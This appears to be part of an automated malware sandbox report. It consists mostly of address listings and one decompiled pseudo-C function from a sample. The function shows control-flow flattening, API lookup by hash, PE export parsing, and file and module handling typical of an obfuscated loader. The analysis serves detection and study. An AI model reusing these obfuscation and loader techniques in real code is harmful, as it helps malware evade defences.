                                                                                                                                                        0x012e183e
                                                                                                                                                        0x012e20ed
                                                                                                                                                        0x012e20f2
                                                                                                                                                        0x012e1844
                                                                                                                                                        0x012e1849
                                                                                                                                                        0x012e1861
                                                                                                                                                        0x012e1869
                                                                                                                                                        0x012e1871
                                                                                                                                                        0x012e187c
                                                                                                                                                        0x012e1895
                                                                                                                                                        0x012e1895
                                                                                                                                                        0x012e1849
                                                                                                                                                        0x012e1363
                                                                                                                                                        0x012e1368
                                                                                                                                                        0x012e1d99
                                                                                                                                                        0x012e1da5
                                                                                                                                                        0x012e1db0
                                                                                                                                                        0x012e136e
                                                                                                                                                        0x012e1373
                                                                                                                                                        0x012e1dbc
                                                                                                                                                        0x012e1dc1
                                                                                                                                                        0x012e1379
                                                                                                                                                        0x012e137e
                                                                                                                                                        0x012e1384
                                                                                                                                                        0x012e1384
                                                                                                                                                        0x012e1389
                                                                                                                                                        0x012e13a8
                                                                                                                                                        0x012e13b4
                                                                                                                                                        0x012e13bc
                                                                                                                                                        0x012e13c4
                                                                                                                                                        0x012e13ce
                                                                                                                                                        0x012e13d4
                                                                                                                                                        0x012e13da
                                                                                                                                                        0x012e13df
                                                                                                                                                        0x012e13e8
                                                                                                                                                        0x012e13ee
                                                                                                                                                        0x012e13f4
                                                                                                                                                        0x012e13f7
                                                                                                                                                        0x012e1405
                                                                                                                                                        0x012e1405
                                                                                                                                                        0x012e137e
                                                                                                                                                        0x012e1373
                                                                                                                                                        0x012e1368
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e135d
                                                                                                                                                        0x012e10b4
                                                                                                                                                        0x012e15cc
                                                                                                                                                        0x012e1fbe
                                                                                                                                                        0x012e1fc8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e1fc8
                                                                                                                                                        0x012e15d7
                                                                                                                                                        0x012e15e2
                                                                                                                                                        0x012e15e7
                                                                                                                                                        0x012e15f1
                                                                                                                                                        0x012e1601
                                                                                                                                                        0x012e1614
                                                                                                                                                        0x012e161c
                                                                                                                                                        0x012e1624
                                                                                                                                                        0x012e1627
                                                                                                                                                        0x012e1636
                                                                                                                                                        0x012e163c
                                                                                                                                                        0x012e1642
                                                                                                                                                        0x012e1647
                                                                                                                                                        0x012e164d
                                                                                                                                                        0x012e165b
                                                                                                                                                        0x012e165b
                                                                                                                                                        0x012e10ba
                                                                                                                                                        0x012e10bf
                                                                                                                                                        0x012e1b1d
                                                                                                                                                        0x012e1b1d
                                                                                                                                                        0x012e1b25
                                                                                                                                                        0x012e1b37
                                                                                                                                                        0x012e1b3f
                                                                                                                                                        0x012e1b54
                                                                                                                                                        0x012e1b5c
                                                                                                                                                        0x012e1b66
                                                                                                                                                        0x012e1b6c
                                                                                                                                                        0x012e1b72
                                                                                                                                                        0x012e1b77
                                                                                                                                                        0x012e1b7c
                                                                                                                                                        0x012e1b82
                                                                                                                                                        0x012e1b88
                                                                                                                                                        0x012e1b8b
                                                                                                                                                        0x012e1b90
                                                                                                                                                        0x012e1b9e
                                                                                                                                                        0x012e10c5
                                                                                                                                                        0x012e10ca
                                                                                                                                                        0x012e1bb2
                                                                                                                                                        0x012e10d0
                                                                                                                                                        0x012e10d5
                                                                                                                                                        0x012e10db
                                                                                                                                                        0x012e10ed
                                                                                                                                                        0x012e10f3
                                                                                                                                                        0x012e10f9
                                                                                                                                                        0x012e1109
                                                                                                                                                        0x012e1115
                                                                                                                                                        0x012e111a
                                                                                                                                                        0x012e111f
                                                                                                                                                        0x012e1124
                                                                                                                                                        0x012e1124
                                                                                                                                                        0x012e10d5
                                                                                                                                                        0x012e10ca
                                                                                                                                                        0x012e10bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e10b4
                                                                                                                                                        0x012e0eb2
                                                                                                                                                        0x012e11f9
                                                                                                                                                        0x012e16f2
                                                                                                                                                        0x012e202f
                                                                                                                                                        0x012e2034
                                                                                                                                                        0x012e2043
                                                                                                                                                        0x012e204b
                                                                                                                                                        0x012e205a
                                                                                                                                                        0x012e2062
                                                                                                                                                        0x012e206c
                                                                                                                                                        0x012e2072
                                                                                                                                                        0x012e2078
                                                                                                                                                        0x012e207d
                                                                                                                                                        0x012e2086
                                                                                                                                                        0x012e208c
                                                                                                                                                        0x012e2092
                                                                                                                                                        0x012e20a1
                                                                                                                                                        0x012e16f8
                                                                                                                                                        0x012e16fd
                                                                                                                                                        0x012e1714
                                                                                                                                                        0x012e1714
                                                                                                                                                        0x012e16fd
                                                                                                                                                        0x012e11ff
                                                                                                                                                        0x012e1204
                                                                                                                                                        0x012e1c6b
                                                                                                                                                        0x012e1c77
                                                                                                                                                        0x012e120a
                                                                                                                                                        0x012e120f
                                                                                                                                                        0x012e1c92
                                                                                                                                                        0x012e1ca2
                                                                                                                                                        0x012e1caa
                                                                                                                                                        0x012e1cc2
                                                                                                                                                        0x012e1215
                                                                                                                                                        0x012e121a
                                                                                                                                                        0x012e123d
                                                                                                                                                        0x012e1245
                                                                                                                                                        0x012e124f
                                                                                                                                                        0x012e1255
                                                                                                                                                        0x012e125b
                                                                                                                                                        0x012e1260
                                                                                                                                                        0x012e1269
                                                                                                                                                        0x012e126f
                                                                                                                                                        0x012e1275
                                                                                                                                                        0x012e1275
                                                                                                                                                        0x012e127d
                                                                                                                                                        0x012e128b
                                                                                                                                                        0x012e128b
                                                                                                                                                        0x012e121a
                                                                                                                                                        0x012e120f
                                                                                                                                                        0x012e1204
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e11f9
                                                                                                                                                        0x012e0ebd
                                                                                                                                                        0x012e14cd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e14d8
                                                                                                                                                        0x012e14e5
                                                                                                                                                        0x012e1506
                                                                                                                                                        0x012e1506
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e14d8
                                                                                                                                                        0x012e0ec8
                                                                                                                                                        0x012e211b
                                                                                                                                                        0x012e2135
                                                                                                                                                        0x012e0ece
                                                                                                                                                        0x012e0ed3
                                                                                                                                                        0x012e0ee4
                                                                                                                                                        0x012e0ef3
                                                                                                                                                        0x012e0f01
                                                                                                                                                        0x012e0f08
                                                                                                                                                        0x012e0f0d
                                                                                                                                                        0x012e0f0d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0ed3
                                                                                                                                                        0x012e0ec8
                                                                                                                                                        0x012e0df7
                                                                                                                                                        0x012e0fca
                                                                                                                                                        0x012e12d9
                                                                                                                                                        0x012e175d
                                                                                                                                                        0x012e20b3
                                                                                                                                                        0x012e20bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e20bf
                                                                                                                                                        0x012e1768
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e1784
                                                                                                                                                        0x012e1788
                                                                                                                                                        0x012e1792
                                                                                                                                                        0x012e1799
                                                                                                                                                        0x012e17a4
                                                                                                                                                        0x012e17b6
                                                                                                                                                        0x012e17ea
                                                                                                                                                        0x012e17ea
                                                                                                                                                        0x012e17f2
                                                                                                                                                        0x012e1800
                                                                                                                                                        0x012e1811
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e1811
                                                                                                                                                        0x012e17ba
                                                                                                                                                        0x012e17d9
                                                                                                                                                        0x012e17e3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e12df
                                                                                                                                                        0x012e12e4
                                                                                                                                                        0x012e1d08
                                                                                                                                                        0x012e1d0d
                                                                                                                                                        0x012e1d12
                                                                                                                                                        0x012e1d17
                                                                                                                                                        0x012e12ea
                                                                                                                                                        0x012e12ef
                                                                                                                                                        0x012e1d27
                                                                                                                                                        0x012e1d2c
                                                                                                                                                        0x012e1d3b
                                                                                                                                                        0x012e12f5
                                                                                                                                                        0x012e12fa
                                                                                                                                                        0x012e1300
                                                                                                                                                        0x012e1305
                                                                                                                                                        0x012e1305
                                                                                                                                                        0x012e12fa
                                                                                                                                                        0x012e12ef
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e12e4
                                                                                                                                                        0x012e12d9
                                                                                                                                                        0x012e0fd5
                                                                                                                                                        0x012e155d
                                                                                                                                                        0x012e1f76
                                                                                                                                                        0x012e1f81
                                                                                                                                                        0x012e1f85
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e1f85
                                                                                                                                                        0x012e1568
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0fdb
                                                                                                                                                        0x012e0fe0
                                                                                                                                                        0x012e1a14
                                                                                                                                                        0x012e1a1b
                                                                                                                                                        0x012e1a26
                                                                                                                                                        0x012e1a35
                                                                                                                                                        0x012e1a3b
                                                                                                                                                        0x012e1a41
                                                                                                                                                        0x012e1a46
                                                                                                                                                        0x012e1a4c
                                                                                                                                                        0x012e1a5a
                                                                                                                                                        0x012e0fe6
                                                                                                                                                        0x012e0feb
                                                                                                                                                        0x012e1a62
                                                                                                                                                        0x012e1a67
                                                                                                                                                        0x012e1a6c
                                                                                                                                                        0x012e1a71
                                                                                                                                                        0x012e0ff1
                                                                                                                                                        0x012e0ff6
                                                                                                                                                        0x012e100e
                                                                                                                                                        0x012e100e
                                                                                                                                                        0x012e0ff6
                                                                                                                                                        0x012e0feb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0fe0
                                                                                                                                                        0x012e0fd5
                                                                                                                                                        0x012e0e02
                                                                                                                                                        0x012e116f
                                                                                                                                                        0x012e16a7
                                                                                                                                                        0x012e1ff0
                                                                                                                                                        0x012e1ff8
                                                                                                                                                        0x012e2012
                                                                                                                                                        0x012e16ad
                                                                                                                                                        0x012e16b2
                                                                                                                                                        0x012e16b8
                                                                                                                                                        0x012e16c4
                                                                                                                                                        0x012e16c4
                                                                                                                                                        0x012e16b2
                                                                                                                                                        0x012e1175
                                                                                                                                                        0x012e117a
                                                                                                                                                        0x012e1c12
                                                                                                                                                        0x012e1180
                                                                                                                                                        0x012e1185
                                                                                                                                                        0x012e1c21
                                                                                                                                                        0x012e1c28
                                                                                                                                                        0x012e1c43
                                                                                                                                                        0x012e118b
                                                                                                                                                        0x012e1190
                                                                                                                                                        0x012e119a
                                                                                                                                                        0x012e11a1
                                                                                                                                                        0x012e11aa
                                                                                                                                                        0x012e11aa
                                                                                                                                                        0x012e1190
                                                                                                                                                        0x012e1185
                                                                                                                                                        0x012e117a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e116f
                                                                                                                                                        0x012e0e0d
                                                                                                                                                        0x012e145a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e1e10
                                                                                                                                                        0x012e1465
                                                                                                                                                        0x012e1e1d
                                                                                                                                                        0x012e1e22
                                                                                                                                                        0x012e1e27
                                                                                                                                                        0x012e1e2c
                                                                                                                                                        0x012e1e31
                                                                                                                                                        0x012e146b
                                                                                                                                                        0x012e1470
                                                                                                                                                        0x012e1476
                                                                                                                                                        0x012e1482
                                                                                                                                                        0x012e1482
                                                                                                                                                        0x012e1470
                                                                                                                                                        0x012e0e13
                                                                                                                                                        0x012e0e18
                                                                                                                                                        0x012e191b
                                                                                                                                                        0x012e191e
                                                                                                                                                        0x012e1930
                                                                                                                                                        0x012e1936
                                                                                                                                                        0x012e193c
                                                                                                                                                        0x012e1941
                                                                                                                                                        0x012e194a
                                                                                                                                                        0x012e1950
                                                                                                                                                        0x012e1956
                                                                                                                                                        0x012e1965
                                                                                                                                                        0x012e0e1e
                                                                                                                                                        0x012e0e23
                                                                                                                                                        0x012e196d
                                                                                                                                                        0x012e1979
                                                                                                                                                        0x012e0e29
                                                                                                                                                        0x012e0e2e
                                                                                                                                                        0x012e0e30
                                                                                                                                                        0x012e0e3c
                                                                                                                                                        0x012e0e3c
                                                                                                                                                        0x012e0e2e
                                                                                                                                                        0x012e0e23
                                                                                                                                                        0x012e0e18
                                                                                                                                                        0x012e0e0d
                                                                                                                                                        0x012e0de0
                                                                                                                                                        0x012e0d45
                                                                                                                                                        0x012e0d45
                                                                                                                                                        0x012e0d4c
                                                                                                                                                        0x012e0d4e
                                                                                                                                                        0x012e0d53
                                                                                                                                                        0x012e0d58
                                                                                                                                                        0x012e0d5d
                                                                                                                                                        0x012e0d60
                                                                                                                                                        0x012e0d65
                                                                                                                                                        0x012e0d6d
                                                                                                                                                        0x012e0d7a
                                                                                                                                                        0x012e0d7d
                                                                                                                                                        0x012e0d82

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 5C%J$5{%J$@$E-F=$i1x$i1x$i1x$y3MW$y3MW
                                                                                                                                                        • API String ID: 0-3245447435
                                                                                                                                                        • Opcode ID: 3721f08dcbe7e9d9de49ab0583542fd35cd21ca5046f297c1f08b81bf71f4095
                                                                                                                                                        • Instruction ID: 186f05fe30374fa8757bf4324a3ed6c051acf5d54352b4cf5e3257f94178e7a3
                                                                                                                                                        • Opcode Fuzzy Hash: 3721f08dcbe7e9d9de49ab0583542fd35cd21ca5046f297c1f08b81bf71f4095
                                                                                                                                                        • Instruction Fuzzy Hash: BA92EB327286C5C6DB348B59E4847AEBBD0E7C4B84F90441AEB89C7B58CB78D492CF45
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D1517, Relevance: 10.7, Strings: 8, Instructions: 708COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 56%
                                                                                                                                                        			E012D1517(void* __edi, signed char* __rcx, long long* __rdx, void* __r8, void* __r11) {
				char _v68;
				long long _v80;
				signed int _v88;
				long long _v96;
				void* _v104;
				signed char* _v112;
				signed char* _v120;
				void* _v128;
				long long _v136;
				long long _v144;
				signed char* _v152;
				long long _v160;
				void* _v168;
				long long _v176;
				signed char* _v180;
				signed char* _v184;
				intOrPtr _v188;
				char _v192;
				char _v196;
				signed char* _v208;
				void* _v216;
				signed char* _v224;
				signed char* _v232;
				signed char* _v240;
				signed char* _v248;
				signed char* _v252;
				signed int _v256;
				intOrPtr _v260;
				signed char* _v264;
				char _v268;
				signed char* _v272;
				signed char* _v276;
				signed char* _v280;
				signed char* _v284;
				signed char* _v288;
				signed char* _v292;
				signed char* _v296;
				signed char* _v300;
				signed char* _v304;
				signed char* _v308;
				signed char* _v312;
				signed char* _v316;
				signed char* _v328;
				signed char* _v336;
				signed char* _v344;
				signed char* _v352;
				signed char* _v360;
				signed char* _v364;
				signed char* _v368;
				signed char* _v372;
				signed char* _v376;
				signed char* _v380;
				signed char* _v384;
				signed char* _v392;
				signed char* _v396;
				signed char* _v400;
				signed char* _v404;
				long long _v416;
				signed char* _v420;
				char _v421;
				long long _v440;
				signed char* _v448;
				signed char* _v456;
				void* _t242;
				void* _t290;
				void* _t408;
				signed char* _t409;
				intOrPtr* _t417;
				long long _t418;
				intOrPtr* _t423;
				intOrPtr* _t425;
				void* _t428;
				signed char* _t429;
				signed char* _t441;
				signed char* _t447;
				long long _t467;
				signed char* _t476;
				long long* _t480;
				void* _t481;
				void* _t484;
				intOrPtr* _t485;
				signed int _t488;
				signed char* _t490;
				signed char* _t492;

				_t484 = __r11;
				_t481 = __r8;
				_t408 = __edi;
				_t480 = __rdx;
				_t490 = __rcx;
				_t1 =  &_v192; // 0xff390d80
				_t417 = _t1;
				_v176 = _t417;
				 *_t417 = 0x10b;
				_t4 =  &_v196; // 0xff390d7c
				_t418 = _t4;
				_v168 = _t418;
				 *_t418 = 0x20b;
				E012DCDB9(0x105, _t418);
				_v216 = _t418;
				_t242 = 0x27206c57;
				_v224 = _v168;
				L1:
				while(1) {
					L1:
					while(1) {
						L1:
						while(1) {
							while(_t242 <= 0x3514ce2) {
								if(_t242 > 0xce9f521b) {
									if(_t242 <= 0xe9d19539) {
										if(_t242 > 0xde8a4662) {
											if(_t242 == 0xde8a4663) {
												_t485 = _v136 + 0x70;
												_t242 = 0x19057b94;
												continue;
											}
											if(_t242 == 0xe31b7a87) {
												_t242 = 0x31054ddd;
												_v380 = 8;
												L113:
												_v376 = 4;
												_v384 = _v420;
												continue;
											}
											if(_t242 == 0xe354ce68) {
												_t429 = _v360;
												_v352 = _t429;
												_t242 = 0xeb3455f8;
												_t492 = _v328;
												_v400 = _v280;
											}
											continue;
										}
										if(_t242 == 0xce9f521c) {
											_t429 = _v392;
											_v256 =  *_t429 & 0x000000ff;
											_t290 = 0x803d3816;
											L97:
											_t242 =  ==  ? 0x95bc53b5 : _t290;
										} else {
											if(_t242 == 0xd977d278) {
												_t429 = _v360;
												_v352 = _t429;
												_t242 = 0xeb3455f8;
												_v400 = 4;
												_t492 = _v328;
											} else {
												if(_t242 == 0xdce48132) {
													_t441 = _v80;
													r8d = 0xa38a7988;
													r9d = 7;
													E012DFAD7(1, _t409, _t429, _t447);
													_t447 = _v344;
													 *_t429();
													_v392 = _t429;
													_t242 =  ==  ? 0x5d609141 : 0xce9f521c;
												}
											}
										}
										continue;
									}
									if(_t242 <= 0xefa92702) {
										if(_t242 == 0xe9d1953a) {
											r8d = 0x70a2aa8;
											r9d = 6;
											E012DFAD7(1, _t409, _t429, _t447);
											_t447 = _v160;
											 *_t429();
											_t242 = 0x7637c803;
										} else {
											if(_t242 == 0xeb3455f8) {
												_t429 = _v152;
												_t242 = 0x9c60fd38;
												_v232 = _v336;
												_v396 = _v400;
												_v240 = _t492;
												_t447 = _v352;
												_v248 = _t447;
											} else {
												if(_t242 == 0xef150508) {
													r8d = 0xc170aa8d;
													r9d = 0x26;
													E012DFAD7(1, _t409, _t429, _t447);
													_v448 = _t441;
													_v456 = 0;
													_t447 = _v336;
													r8d = 2;
													r9d = 0;
													 *_t429();
													_v360 = _t429;
													_t242 =  ==  ? 0xc0649264 : 0x29b128af;
												}
											}
										}
										continue;
									}
									if(_t242 == 0xdf7299) {
										E012DCC2E(_t429, _v216);
										return _v180;
									}
									if(_t242 == 0xefa92703) {
										_v304 = _v420;
										_t242 = 0xa81e0ee0;
										_v300 = 6;
										_v308 = _v404;
										continue;
									}
									if(_t242 != 0xfbb38e81) {
										continue;
									} else {
										_t429 = _v392;
										_t290 = 0x39692835;
										goto L97;
									}
								}
								if(_t242 <= 0xa8687d19) {
									if(_t242 > 0x9d4868de) {
										if(_t242 == 0x9d4868df) {
											L79:
											_v368 = _v420;
											_t242 = 0xca847125;
											_v364 = 6;
											_v372 = _v404;
											continue;
										}
										if(_t242 == 0xa6a97300) {
											_t189 =  &_v68; // 0xff390dfc
											_t441 = _t189;
											_v152 = _t441;
											_t429 = _v152;
											r8d = 0x626eda1b;
											r9d = 0x25;
											E012DFAD7(1, _t409, _t429, _t447);
											_t447 = _v336;
											_v260 =  *_t429();
											_t242 =  ==  ? 0x3b8c4137 : 0xef150508;
										} else {
											if(_t242 == 0xa81e0ee0) {
												_t242 = 0xca847125;
												_v364 = _v300;
												_v372 = _v308;
												_v368 = _v304;
											}
										}
									} else {
										if(_t242 == 0x803d3816) {
											_t242 =  ==  ? 0xfbb38e81 : 0x9d4868df;
										} else {
											if(_t242 == 0x95bc53b5) {
												_t447 = _v208;
												r8d = 0xa;
												E012DCA65(_t447, _v392, _t481);
												_t242 =  ==  ? 0xefa92703 : 0x1e7bd62b;
											} else {
												if(_t242 == 0x9c60fd38) {
													_v180 = _v396;
													r8d = 0x53942abd;
													r9d = 0x2d;
													E012DFAD7(1, _t409, _t429, _t447);
													 *_t429();
													r8d = 0x2db58ff7;
													r9d = 0x11;
													E012DFAD7(1, _t409, _t429, _v240);
													 *_t429();
													r8d = 0x2db58ff7;
													r9d = 0x11;
													E012DFAD7(1, _t409, _t429, _v248);
													_t447 = _v232;
													 *_t429();
													_t242 =  !=  ? 0xc4fd3341 : 0x4000acdb;
												}
											}
										}
									}
									continue;
								}
								if(_t242 <= 0xc0649263) {
									if(_t242 == 0xa8687d1a) {
										_t242 = 0x3514ce3;
										_v272 = _v288;
										_v284 = _v296;
										_v276 = _v292;
										continue;
									}
									if(_t242 == 0xaeffa557) {
										_t423 = _v96;
										E012D124E( *_t423, _v416, _t484);
										_v80 = _t423 + _v416;
										_t425 = _v120;
										E012D124E( *_t425, _v416, _t484);
										_t428 = _t425 + _v416 - 0xb50b708c + _v88 * 4;
										E012D124E( *((intOrPtr*)(0xb50b708c + _t428)), _v416, _t484);
										_t429 = _t428 + _v416;
										_v208 = _t429;
										_t447 = _v208;
										E012D10C3(_t408, _t447);
										_t242 =  !=  ? 0x36060a0e : 0xdce48132;
										continue;
									}
									if(_t242 == 0xbbcc6223) {
										_t242 = 0x9c60fd38;
										_v396 = 1;
										_t447 = _v336;
										_v232 = _t447;
										_v240 = _t447;
										L87:
										_v248 = _t447;
									}
								} else {
									if(_t242 > 0xca847124) {
										if(_t242 == 0xca847125) {
											_t242 = 0xa8687d1a;
											_v288 = _v364;
											_v296 = _v372;
											_v292 = _v368;
										} else {
											if(_t242 == 0xcaecfdac) {
												_v160 =  *_t480;
												_t242 =  ==  ? 0x7637c803 : 0xe9d1953a;
											}
										}
									} else {
										if(_t242 == 0xc0649264) {
											_t242 = 0xeb3455f8;
											_v400 = 3;
											_v352 = _v360;
											r15d = 0;
										} else {
											if(_t242 == 0xc4fd3341) {
												 *_t480 = _v344;
												_t242 = 0xdf7299;
											}
										}
									}
								}
							}
							if(_t242 <= 0x3b8c4136) {
								if(_t242 > 0x1e7bd62a) {
									if(_t242 > 0x31054ddc) {
										if(_t242 == 0x31054ddd) {
											_t242 = 0xa81e0ee0;
											_v300 = _v376;
											_v308 = _v380;
											_v304 = _v384;
											continue;
										}
										if(_t242 == 0x36060a0e) {
											_v276 = _v420;
											_t242 = 0x3514ce3;
											_v272 = 6;
											_v284 = _v404;
											continue;
										}
										if(_t242 != 0x39692835) {
											continue;
										}
										goto L79;
									} else {
										if(_t242 == 0x1e7bd62b) {
											_t119 =  &_v264; // 0xff390d38
											_t441 = _t119;
											_v112 = _t441;
											_v264 = 0;
											_t123 =  &_v268; // 0xff390d34
											_v104 = _t123;
											_t429 = _v104;
											_v268 = 0;
											r8d = 0xc25fe71;
											r9d = 0xf;
											E012DFAD7(1, _t409, _t429, _t447);
											_t447 = _v392;
											r8d = 0x40;
											 *_t429();
											_t242 =  ==  ? 0xb1128e6 : 0x621f46bf;
										} else {
											if(_t242 == 0x27206c57) {
												_v421 = _t480 != 0;
												_t242 =  !=  ? 0xcaecfdac : 0x7637c803;
											} else {
												if(_t242 == 0x29b128af) {
													r8d = 0xc1942bda;
													r9d = 0x28;
													E012DFAD7(1, _t409, _t429, _t447);
													_v456 = _t441;
													_t447 = _v360;
													r8d = 0;
													r9d = 0;
													 *_t429();
													_v328 = _t429;
													_t242 =  ==  ? 0xd977d278 : 0x1bcac217;
												}
											}
										}
										continue;
									}
								}
								if(_t242 > 0x19057b93) {
									if(_t242 == 0x19057b94) {
										E012D124E( *_t485, _v416, _t484);
										_t447 = _v416;
										_t476 =  &(( &(_t447[_t429]))[0x1c]);
										_t408 = E012D124E(_t476[4], _v416, _t484);
										_t467 = _t467 + _v416;
										_v120 = _t476;
										_t429 = _v120;
										E012D124E( *_t429, _v416, _t484);
										r13d = E012D124E(_t476[8], _v416, _t484);
										_t488 = _t488 + _v416;
										_v224 = _t429;
										_t242 = 0x48bbf34f;
										_v312 = 0;
										_v316 = 0;
									} else {
										if(_t242 == 0x1a930cd5) {
											_t467 = _v96 + 4;
											_t488 =  &(2[_v88]);
											_v224 = _t429;
											_v316 = _v184;
											_t242 = 0x48bbf34f;
											_v312 = _v252;
										} else {
											if(_t242 == 0x1bcac217) {
												_v416 = _v328;
												_v144 =  *((intOrPtr*)(_v416 + 0x3c)) + _v416;
												_v136 = _v144 + 0x18;
												_v128 = _v136;
												_t429 = _v128;
												_t242 =  ==  ? 0x3c71ab6f : 0x4bbd8e86;
											}
										}
									}
									continue;
								}
								if(_t242 == 0x3514ce3) {
									_v252 = _v284;
									_v184 = _v276;
									_t242 =  ==  ? 0xe354ce68 : 0x1a930cd5;
									_v280 = _v252;
									continue;
								}
								if(_t242 == 0x568c825) {
									L86:
									_t242 = 0x9c60fd38;
									_v396 = 1;
									_v240 = _t447;
									_v232 = _t447;
									goto L87;
								}
								if(_t242 != 0xb1128e6) {
									continue;
								} else {
									_t242 = 0x31054ddd;
									_v380 = 7;
									goto L113;
								}
							}
							if(_t242 <= 0x4dd9310b) {
								if(_t242 > 0x48bbf34e) {
									if(_t242 == 0x48bbf34f) {
										_v96 = _t467;
										_v88 = _t488;
										_v404 = _v312;
										_v420 = _v316;
										_t447 = _v224;
										_v188 = _t447 - 1;
										_t242 =  <  ? 0xe354ce68 : 0xaeffa557;
										_v280 = _v404;
									} else {
										if(_t242 == 0x4bbd8e86) {
											_t429 = _v128;
											_t242 =  ==  ? 0xde8a4663 : 0x4d1808df;
										} else {
											if(_t242 == 0x4d1808df) {
												_t429 = _v360;
												_v352 = _t429;
												_t242 = 0xeb3455f8;
												_v400 = 5;
												_t492 = _v328;
											}
										}
									}
								} else {
									if(_t242 == 0x3b8c4137) {
										_t242 = 0xeb3455f8;
										_v400 = 2;
										r15d = 0;
										_v352 = _t447;
									} else {
										if(_t242 == 0x3c71ab6f) {
											_t485 = _v144 + 0x78;
											_t242 = 0x19057b94;
										} else {
											if(_t242 == 0x4000acdb) {
												r8d = 0x70a2aa8;
												r9d = 6;
												E012DFAD7(1, _t409, _t429, _t447);
												_t447 = _v344;
												 *_t429();
												_t242 = 0xdf7299;
											}
										}
									}
								}
								continue;
							}
							if(_t242 <= 0x6b334edf) {
								if(_t242 == 0x4dd9310c) {
									_v384 =  &(_v420[1]);
									_t242 = 0x31054ddd;
									_v376 = 0;
									_v380 = _v404;
								} else {
									if(_t242 == 0x5d609141) {
										_v292 = _v420;
										_t242 = 0xa8687d1a;
										_v288 = 6;
										_v296 = _v404;
									} else {
										if(_t242 == 0x621f46bf) {
											r8d = 0xa;
											E012DC96E(_t242, _v392, _v208);
											_t409 = _v264;
											_t441 = _v392;
											r8d = 0xc25fe71;
											r9d = 0xf;
											E012DFAD7(1, _t409, _t429, _v392);
											_t447 = _t441;
											r8d = _t409;
											 *_t429();
											_t242 =  ==  ? 0xe31b7a87 : 0x4dd9310c;
										}
									}
								}
								continue;
							}
							if(_t242 > 0x758502d3) {
								if(_t242 == 0x758502d4) {
									goto L86;
								}
								if(_t242 == 0x7637c803) {
									r8d = 0x84161500;
									r9d = 2;
									E012DFAD7(1, _t409, _t429, _t447);
									_t447 = _t490;
									 *_t429();
									_v344 = _t429;
									_t242 =  ==  ? 0x568c825 : 0x6b334ee0;
								}
							} else {
								if(_t242 == 0x6b334ee0) {
									_t441 = _v344;
									r8d = 0x5d017afb;
									r9d = 0x32;
									E012DFAD7(1, _t409, _t429, _t447);
									_t447 = _t441;
									r8d = 0x104;
									 *_t429();
									_t242 =  ==  ? 0x758502d4 : 0x6f5e22e4;
								} else {
									if(_t242 == 0x6f5e22e4) {
										r8d = 0xc477c672;
										r9d = 0x14;
										E012DFAD7(1, _t409, _t429, _t447);
										_v440 = 0;
										_v448 = 0x80;
										_v456 = 3;
										_t447 = _v216;
										r8d = 1;
										r9d = 0;
										 *_t429();
										_v336 = _t429;
										_t429 = _v336;
										_t242 =  ==  ? 0xbbcc6223 : 0xa6a97300;
									}
								}
							}
						}
					}
				}
			}























































































                                                                                                                                                        0x012d1517
                                                                                                                                                        0x012d1517
                                                                                                                                                        0x012d1517
                                                                                                                                                        0x012d152a
                                                                                                                                                        0x012d152d
                                                                                                                                                        0x012d1530
                                                                                                                                                        0x012d1530
                                                                                                                                                        0x012d1538
                                                                                                                                                        0x012d1548
                                                                                                                                                        0x012d154e
                                                                                                                                                        0x012d154e
                                                                                                                                                        0x012d1556
                                                                                                                                                        0x012d1566
                                                                                                                                                        0x012d1571
                                                                                                                                                        0x012d1576
                                                                                                                                                        0x012d157e
                                                                                                                                                        0x012d1583
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d158b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d158b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d158b
                                                                                                                                                        0x012d158b
                                                                                                                                                        0x012d1597
                                                                                                                                                        0x012d169c
                                                                                                                                                        0x012d183e
                                                                                                                                                        0x012d1bbd
                                                                                                                                                        0x012d2291
                                                                                                                                                        0x012d2295
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2295
                                                                                                                                                        0x012d1bc8
                                                                                                                                                        0x012d229f
                                                                                                                                                        0x012d22a4
                                                                                                                                                        0x012d22ac
                                                                                                                                                        0x012d22ac
                                                                                                                                                        0x012d22b8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d22b8
                                                                                                                                                        0x012d1bd3
                                                                                                                                                        0x012d1bd9
                                                                                                                                                        0x012d1be1
                                                                                                                                                        0x012d1be9
                                                                                                                                                        0x012d1bee
                                                                                                                                                        0x012d1bfd
                                                                                                                                                        0x012d1bfd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d1bd3
                                                                                                                                                        0x012d1849
                                                                                                                                                        0x012d1e66
                                                                                                                                                        0x012d1e6e
                                                                                                                                                        0x012d1e81
                                                                                                                                                        0x012d1e86
                                                                                                                                                        0x012d1e8b
                                                                                                                                                        0x012d184f
